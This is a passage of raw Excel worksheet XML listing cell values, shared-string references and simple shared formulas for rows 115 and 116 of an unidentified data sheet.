      <c r="CQ115" s="105">
        <v>3.0</v>
      </c>
      <c r="CR115" s="105">
        <v>3.0</v>
      </c>
      <c r="CS115" s="105">
        <v>0.0</v>
      </c>
      <c r="CT115" s="105">
        <v>0.0</v>
      </c>
      <c r="CU115" s="105">
        <v>0.0</v>
      </c>
      <c r="CV115" s="105">
        <v>0.0</v>
      </c>
      <c r="CW115" s="105">
        <v>2.0</v>
      </c>
      <c r="CX115" s="105">
        <v>3.0</v>
      </c>
      <c r="CY115" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ115" s="105">
        <v>3.0</v>
      </c>
      <c r="DA115" s="105">
        <v>3.0</v>
      </c>
      <c r="DB115" s="106">
        <f t="shared" si="176"/>
        <v>2</v>
      </c>
      <c r="DC115" s="106">
        <f t="shared" si="177"/>
        <v>2</v>
      </c>
      <c r="DD115" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE115" s="106">
        <f t="shared" si="179"/>
        <v>3</v>
      </c>
      <c r="DF115" s="106">
        <f t="shared" si="180"/>
        <v>3</v>
      </c>
      <c r="DG115" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH115" s="106">
        <f t="shared" si="181"/>
        <v>3</v>
      </c>
      <c r="DI115" s="106">
        <f t="shared" si="182"/>
        <v>3</v>
      </c>
      <c r="DJ115" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK115" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL115" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM115" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DN115" s="108">
        <v>1.0</v>
      </c>
      <c r="DO115" s="108">
        <v>3.0</v>
      </c>
      <c r="DP115" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ115" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR115" s="108">
        <v>0.0</v>
      </c>
      <c r="DS115" s="108">
        <v>0.0</v>
      </c>
      <c r="DT115" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DU115" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV115" s="108">
        <f t="shared" si="166"/>
        <v>2000418</v>
      </c>
      <c r="DW115" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX115" s="108">
        <v>2000418.0</v>
      </c>
      <c r="DY115" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ115" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA115" s="108">
        <v>0.0</v>
      </c>
      <c r="EB115" s="108">
        <v>0.0</v>
      </c>
      <c r="EC115" s="109">
        <v>7.0</v>
      </c>
      <c r="ED115" s="109">
        <v>2.0</v>
      </c>
      <c r="EE115" s="109">
        <v>3.0</v>
      </c>
      <c r="EF115" s="109">
        <v>0.0</v>
      </c>
      <c r="EG115" s="109">
        <v>3.0</v>
      </c>
      <c r="EH115" s="109">
        <v>3.0</v>
      </c>
      <c r="EI115" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ115" s="109">
        <v>0.0</v>
      </c>
      <c r="EK115" s="109">
        <v>0.0</v>
      </c>
      <c r="EL115" s="109">
        <v>0.0</v>
      </c>
      <c r="EM115" s="109">
        <v>2.0</v>
      </c>
      <c r="EN115" s="109">
        <v>3.0</v>
      </c>
      <c r="EO115" s="109">
        <v>0.0</v>
      </c>
      <c r="EP115" s="109">
        <v>3.0</v>
      </c>
      <c r="EQ115" s="109">
        <v>3.0</v>
      </c>
      <c r="ER115" s="110">
        <f t="shared" si="184"/>
        <v>2</v>
      </c>
      <c r="ES115" s="110">
        <f t="shared" si="185"/>
        <v>2</v>
      </c>
      <c r="ET115" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU115" s="110">
        <f t="shared" si="187"/>
        <v>3</v>
      </c>
      <c r="EV115" s="110">
        <f t="shared" si="188"/>
        <v>3</v>
      </c>
      <c r="EW115" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX115" s="110">
        <f t="shared" si="190"/>
        <v>3</v>
      </c>
      <c r="EY115" s="110">
        <f t="shared" si="191"/>
        <v>3</v>
      </c>
      <c r="EZ115" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA115" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB115" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC115" s="111" t="s">
        <v>1968</v>
      </c>
      <c r="FD115" s="111">
        <v>6.0</v>
      </c>
      <c r="FE115" s="111">
        <v>22.0</v>
      </c>
      <c r="FF115" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG115" s="111" t="s">
        <v>1969</v>
      </c>
      <c r="FH115" s="111">
        <v>4.0</v>
      </c>
      <c r="FI115" s="111">
        <v>7.0</v>
      </c>
      <c r="FJ115" s="111" t="s">
        <v>1968</v>
      </c>
      <c r="FK115" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL115" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2000418, 2002752, 2002749, 2051116, 2000418, 2011803</v>
      </c>
      <c r="FM115" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN115" s="111" t="s">
        <v>1968</v>
      </c>
      <c r="FO115" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP115" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ115" s="111">
        <v>0.0</v>
      </c>
      <c r="FR115" s="111">
        <v>0.0</v>
      </c>
      <c r="FS115" s="112">
        <v>7.0</v>
      </c>
      <c r="FT115" s="112">
        <v>4.0</v>
      </c>
      <c r="FU115" s="112">
        <v>13.0</v>
      </c>
      <c r="FV115" s="112">
        <v>3.0</v>
      </c>
      <c r="FW115" s="112">
        <v>19.0</v>
      </c>
      <c r="FX115" s="112">
        <v>22.0</v>
      </c>
      <c r="FY115" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ115" s="112">
        <v>0.0</v>
      </c>
      <c r="GA115" s="112">
        <v>0.0</v>
      </c>
      <c r="GB115" s="112">
        <v>0.0</v>
      </c>
      <c r="GC115" s="112">
        <v>2.0</v>
      </c>
      <c r="GD115" s="112">
        <v>7.0</v>
      </c>
      <c r="GE115" s="112">
        <v>3.0</v>
      </c>
      <c r="GF115" s="112">
        <v>7.0</v>
      </c>
      <c r="GG115" s="112">
        <v>10.0</v>
      </c>
      <c r="GH115" s="113">
        <f t="shared" si="193"/>
        <v>4</v>
      </c>
      <c r="GI115" s="113">
        <f t="shared" si="194"/>
        <v>2</v>
      </c>
      <c r="GJ115" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK115" s="113">
        <f t="shared" si="196"/>
        <v>13</v>
      </c>
      <c r="GL115" s="113">
        <f t="shared" si="197"/>
        <v>7</v>
      </c>
      <c r="GM115" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN115" s="113">
        <f t="shared" si="199"/>
        <v>22</v>
      </c>
      <c r="GO115" s="113">
        <f t="shared" si="200"/>
        <v>10</v>
      </c>
      <c r="GP115" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ115" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR115" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS115" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT115" s="94"/>
      <c r="GU115" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV115" s="116">
        <v>1.0</v>
      </c>
      <c r="GW115" s="116">
        <v>2.0</v>
      </c>
      <c r="GX115" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY115" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ115" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA115" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB115" s="131" t="s">
        <v>12</v>
      </c>
      <c r="HC115" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD115" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE115" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF115" s="131" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG115" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH115" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI115" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ115" s="93" t="s">
        <v>1970</v>
      </c>
      <c r="HK115" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL115" s="93">
        <v>1.0</v>
      </c>
      <c r="HM115" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN115" s="93">
        <v>0.0</v>
      </c>
      <c r="HO115" s="93">
        <v>0.0</v>
      </c>
      <c r="HP115" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ115" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR115" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS115" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT115" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU115" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV115" s="148">
        <v>33515.0</v>
      </c>
      <c r="HW115" s="119">
        <v>1.0</v>
      </c>
      <c r="HX115" s="119">
        <v>1.0</v>
      </c>
      <c r="HY115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC115" s="120">
        <f t="shared" si="202"/>
        <v>33515</v>
      </c>
      <c r="ID115" s="120">
        <v>33515.0</v>
      </c>
      <c r="IE115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH115" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II115" s="99" t="s">
        <v>1396</v>
      </c>
      <c r="IJ115" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK115" s="99">
        <v>0.0</v>
      </c>
      <c r="IL115" s="99">
        <v>1.0</v>
      </c>
      <c r="IM115" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN115" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO115" s="98">
        <v>2.0</v>
      </c>
      <c r="IP115" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ115" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR115" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS115" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT115" s="127"/>
      <c r="IU115" s="127"/>
      <c r="IV115" s="127"/>
      <c r="IW115" s="127"/>
      <c r="IX115" s="127"/>
      <c r="IY115" s="127"/>
      <c r="IZ115" s="127"/>
      <c r="JA115" s="127"/>
      <c r="JB115" s="127"/>
      <c r="JC115" s="127"/>
      <c r="JD115" s="127"/>
      <c r="JE115" s="127"/>
      <c r="JF115" s="127"/>
      <c r="JG115" s="127"/>
      <c r="JH115" s="127"/>
      <c r="JI115" s="127"/>
      <c r="JJ115" s="127"/>
      <c r="JK115" s="127"/>
      <c r="JL115" s="127"/>
      <c r="JM115" s="127"/>
      <c r="JN115" s="127"/>
      <c r="JO115" s="127"/>
      <c r="JP115" s="127"/>
      <c r="JQ115" s="127"/>
      <c r="JR115" s="127"/>
      <c r="JS115" s="127"/>
      <c r="JT115" s="127"/>
      <c r="JU115" s="127"/>
      <c r="JV115" s="127"/>
      <c r="JW115" s="127"/>
      <c r="JX115" s="127"/>
      <c r="JY115" s="127"/>
      <c r="JZ115" s="127"/>
      <c r="KA115" s="127"/>
      <c r="KB115" s="127"/>
      <c r="KC115" s="127"/>
      <c r="KD115" s="127"/>
      <c r="KE115" s="127"/>
      <c r="KF115" s="127"/>
      <c r="KG115" s="127"/>
      <c r="KH115" s="127"/>
      <c r="KI115" s="127"/>
      <c r="KJ115" s="127"/>
      <c r="KK115" s="127"/>
      <c r="KL115" s="127"/>
      <c r="KM115" s="127"/>
      <c r="KN115" s="127"/>
      <c r="KO115" s="127"/>
      <c r="KP115" s="127"/>
      <c r="KQ115" s="127"/>
      <c r="KR115" s="127"/>
      <c r="KS115" s="127"/>
      <c r="KT115" s="127"/>
      <c r="KU115" s="127"/>
      <c r="KV115" s="127"/>
      <c r="KW115" s="127"/>
      <c r="KX115" s="127"/>
      <c r="KY115" s="127"/>
      <c r="KZ115" s="127"/>
      <c r="LA115" s="127"/>
      <c r="LB115" s="127"/>
      <c r="LC115" s="127"/>
      <c r="LD115" s="127"/>
      <c r="LE115" s="127"/>
      <c r="LF115" s="127"/>
      <c r="LG115" s="127"/>
      <c r="LH115" s="127"/>
      <c r="LI115" s="127"/>
      <c r="LJ115" s="127"/>
      <c r="LK115" s="127"/>
      <c r="LL115" s="127"/>
      <c r="LM115" s="127"/>
      <c r="LN115" s="127"/>
      <c r="LO115" s="127"/>
      <c r="LP115" s="127"/>
      <c r="LQ115" s="127"/>
      <c r="LR115" s="127"/>
      <c r="LS115" s="127"/>
      <c r="LT115" s="127"/>
      <c r="LU115" s="127"/>
      <c r="LV115" s="127"/>
      <c r="LW115" s="127"/>
      <c r="LX115" s="127"/>
      <c r="LY115" s="127"/>
      <c r="LZ115" s="127"/>
      <c r="MA115" s="127"/>
      <c r="MB115" s="127"/>
      <c r="MC115" s="127"/>
      <c r="MD115" s="127"/>
      <c r="ME115" s="127"/>
      <c r="MF115" s="127"/>
      <c r="MG115" s="127"/>
      <c r="MH115" s="127"/>
      <c r="MI115" s="127"/>
      <c r="MJ115" s="127"/>
      <c r="MK115" s="127"/>
      <c r="ML115" s="127"/>
      <c r="MM115" s="127"/>
      <c r="MN115" s="127"/>
      <c r="MO115" s="127"/>
      <c r="MP115" s="127"/>
      <c r="MQ115" s="127"/>
      <c r="MR115" s="127"/>
      <c r="MS115" s="127"/>
      <c r="MT115" s="127"/>
      <c r="MU115" s="127"/>
      <c r="MV115" s="127"/>
      <c r="MW115" s="127"/>
      <c r="MX115" s="127"/>
      <c r="MY115" s="127"/>
      <c r="MZ115" s="127"/>
      <c r="NA115" s="127"/>
      <c r="NB115" s="127"/>
      <c r="NC115" s="127"/>
      <c r="ND115" s="127"/>
      <c r="NE115" s="127"/>
      <c r="NF115" s="127"/>
      <c r="NG115" s="127"/>
      <c r="NH115" s="127"/>
      <c r="NI115" s="127"/>
      <c r="NJ115" s="127"/>
      <c r="NK115" s="127"/>
      <c r="NL115" s="127"/>
      <c r="NM115" s="127"/>
      <c r="NN115" s="127"/>
      <c r="NO115" s="127"/>
      <c r="NP115" s="127"/>
      <c r="NQ115" s="127"/>
      <c r="NR115" s="127"/>
      <c r="NS115" s="127"/>
      <c r="NT115" s="127"/>
      <c r="NU115" s="127"/>
      <c r="NV115" s="127"/>
      <c r="NW115" s="127"/>
      <c r="NX115" s="127"/>
      <c r="NY115" s="127"/>
    </row>
    <row r="116" ht="153.75" customHeight="1">
      <c r="B116" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C116" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D116" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E116" s="90" t="s">
        <v>1971</v>
      </c>
      <c r="F116" s="90" t="s">
        <v>1972</v>
      </c>
      <c r="G116" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H116" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I116" s="92" t="s">
        <v>1973</v>
      </c>
      <c r="J116" s="92" t="s">
        <v>1974</v>
      </c>
      <c r="K116" s="92" t="s">
        <v>1975</v>
      </c>
      <c r="L116" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M116" s="93">
        <v>1.0</v>
      </c>
      <c r="N116" s="93">
        <v>1.0</v>
      </c>
      <c r="O116" s="93">
        <v>0.0</v>
      </c>
      <c r="P116" s="93">
        <v>1.0</v>
      </c>
      <c r="Q116" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R116" s="93">
        <v>1.0</v>
      </c>
      <c r="S116" s="93">
        <v>0.0</v>
      </c>
      <c r="T116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U116" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V116" s="126" t="s">
        <v>1976</v>
      </c>
      <c r="W116" s="96" t="s">
        <v>1977</v>
      </c>
      <c r="X116" s="97" t="s">
        <v>1978</v>
      </c>
      <c r="Y116" s="126" t="s">
        <v>1979</v>
      </c>
      <c r="Z116" s="96" t="s">
        <v>12</v>
      </c>
      <c r="AA116" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB116" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC116" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD116" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE116" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF116" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG116" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH116" s="99" t="s">
        <v>1980</v>
      </c>
      <c r="AI116" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ116" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL116" s="100">
        <v>0.0</v>
      </c>
      <c r="AM116" s="100">
        <v>0.0</v>
      </c>
      <c r="AN116" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP116" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ116" s="100">
        <v>0.0</v>
      </c>
      <c r="AR116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT116" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX116" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY116" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ116" s="100">
        <v>0.0</v>
      </c>
      <c r="BA116" s="102">
        <v>1.0</v>
      </c>
      <c r="BB116" s="102">
        <v>0.0</v>
      </c>
      <c r="BC116" s="102">
        <v>0.0</v>
      </c>
      <c r="BD116" s="102">
        <v>0.0</v>
      </c>
      <c r="BE116" s="102">
        <v>0.0</v>
      </c>
      <c r="BF116" s="102">
        <v>0.0</v>
      </c>
      <c r="BG116" s="102">
        <v>0.0</v>
      </c>
      <c r="BH116" s="102">
        <v>0.0</v>
      </c>
      <c r="BI116" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ116" s="102">
        <v>0.0</v>
      </c>
      <c r="BK116" s="102">
        <v>0.0</v>
      </c>
      <c r="BL116" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM116" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN116" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO116" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP116" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ116" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR116" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS116" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT116" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU116" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV116" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX116" s="104">
        <v>0.0</v>
      </c>
      <c r="BY116" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ116" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB116" s="104">
        <v>0.0</v>
      </c>
      <c r="CC116" s="104">
        <v>0.0</v>
      </c>
      <c r="CD116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF116" s="104" t="str">
        <f t="shared" ref="CF116:CF125" si="203">IF(CD116="-",CE116,CD116)</f>
        <v>-</v>
      </c>
      <c r="CG116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ116" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK116" s="104">
        <v>0.0</v>
      </c>
      <c r="CL116" s="104">
        <v>0.0</v>
      </c>
      <c r="CM116" s="105">
        <v>1.0</v>
      </c>
      <c r="CN116" s="105">
        <v>0.0</v>
      </c>
      <c r="CO116" s="105">
        <v>0.0</v>
      </c>
      <c r="CP116" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ116" s="105">
        <v>0.0</v>
      </c>
      <c r="CR116" s="105">
        <v>0.0</v>
      </c>
      <c r="CS116" s="105">
        <v>0.0</v>
      </c>
      <c r="CT116" s="105">
        <v>0.0</v>
      </c>
      <c r="CU116" s="105">
        <v>0.0</v>
      </c>
      <c r="CV116" s="105">
        <v>0.0</v>
      </c>
      <c r="CW116" s="105">
        <v>0.0</v>
      </c>
      <c r="CX116" s="105">
        <v>0.0</v>
      </c>
      <c r="CY116" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ116" s="105">
        <v>0.0</v>
      </c>
      <c r="DA116" s="105">
        <v>0.0</v>
      </c>
      <c r="DB116" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC116" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD116" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE116" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF116" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG116" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH116" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI116" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ116" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK116" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL116" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM116" s="108">
        <v>13586.0</v>
      </c>
      <c r="DN116" s="108">
        <v>1.0</v>
      </c>
      <c r="DO116" s="108">
        <v>1.0</v>
      </c>
      <c r="DP116" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ116" s="108">
        <v>13586.0</v>
      </c>
      <c r="DR116" s="108">
        <v>1.0</v>
      </c>
      <c r="DS116" s="108">
        <v>1.0</v>
      </c>
      <c r="DT116" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU116" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV116" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW116" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX116" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY116" s="108">
        <v>13586.0</v>
      </c>
      <c r="DZ116" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA116" s="108">
        <v>1.0</v>
      </c>
      <c r="EB116" s="108">
        <v>1.0</v>
      </c>
      <c r="EC116" s="109">
        <v>1.0</v>
      </c>
      <c r="ED116" s="109">
        <v>0.0</v>
      </c>
      <c r="EE116" s="109">
        <v>1.0</v>
      </c>
      <c r="EF116" s="109">
        <v>1.0</v>
      </c>
      <c r="EG116" s="109">
        <v>0.0</v>
      </c>
      <c r="EH116" s="109">
        <v>1.0</v>
      </c>
      <c r="EI116" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ116" s="109">
        <v>0.0</v>
      </c>
      <c r="EK116" s="109">
        <v>1.0</v>
      </c>
      <c r="EL116" s="109">
        <v>1.0</v>
      </c>
      <c r="EM116" s="109">
        <v>0.0</v>
      </c>
      <c r="EN116" s="109">
        <v>1.0</v>
      </c>
      <c r="EO116" s="109">
        <v>1.0</v>
      </c>
      <c r="EP116" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ116" s="109">
        <v>1.0</v>
      </c>
      <c r="ER116" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES116" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET116" s="110">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="EU116" s="110">
        <f t="shared" si="187"/>
        <v>1</v>
      </c>
      <c r="EV116" s="110">
        <f t="shared" si="188"/>
        <v>1</v>
      </c>
      <c r="EW116" s="110">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="EX116" s="110">
        <f t="shared" si="190"/>
        <v>1</v>
      </c>
      <c r="EY116" s="110">
        <f t="shared" si="191"/>
        <v>1</v>
      </c>
      <c r="EZ116" s="110">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="FA116" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB116" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC116" s="111" t="s">
        <v>1981</v>
      </c>
      <c r="FD116" s="111">
        <v>3.0</v>
      </c>
      <c r="FE116" s="111">
        <v>5.0</v>
      </c>
      <c r="FF116" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG116" s="111">
        <v>13586.0</v>
      </c>
      <c r="FH116" s="111">
        <v>1.0</v>
      </c>
      <c r="FI116" s="111">
        <v>1.0</v>
      </c>
      <c r="FJ116" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK116" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL116" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM116" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN116" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO116" s="111">
        <v>13586.0</v>
      </c>
      <c r="FP116" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ116" s="111">
        <v>1.0</v>
      </c>
      <c r="FR116" s="111">
        <v>1.0</v>
      </c>
      <c r="FS116" s="112">
        <v>1.0</v>
      </c>
      <c r="FT116" s="112">
        <v>1.0</v>
      </c>
      <c r="FU116" s="112">
        <v>3.0</v>
      </c>
      <c r="FV116" s="112">
        <v>1.0</v>
      </c>
      <c r="FW116" s="112">
        <v>4.0</v>
      </c>
      <c r="FX116" s="112">
        <v>5.0</v>
      </c>
      <c r="FY116" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ116" s="112">
        <v>0.0</v>
      </c>
      <c r="GA116" s="112">
        <v>1.0</v>
      </c>
      <c r="GB116" s="112">
        <v>1.0</v>
      </c>
      <c r="GC116" s="112">
        <v>0.0</v>
      </c>
      <c r="GD116" s="112">
        <v>1.0</v>
      </c>
      <c r="GE116" s="112">
        <v>1.0</v>
      </c>
      <c r="GF116" s="112">
        <v>0.0</v>
      </c>
      <c r="GG116" s="112">
        <v>1.0</v>
      </c>
      <c r="GH116" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI116" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ116" s="113">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="GK116" s="113">
        <f t="shared" si="196"/>
        <v>3</v>
      </c>
      <c r="GL116" s="113">
        <f t="shared" si="197"/>
        <v>1</v>
      </c>
      <c r="GM116" s="113">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="GN116" s="113">
        <f t="shared" si="199"/>
        <v>5</v>
      </c>
      <c r="GO116" s="113">
        <f t="shared" si="200"/>
        <v>1</v>
      </c>
      <c r="GP116" s="113">
        <f t="shared" si="201"/>
        <v>1</v>
      </c>
      <c r="GQ116" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR116" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS116" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT116" s="94"/>
      <c r="GU116" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV116" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW116" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE116" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF116" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
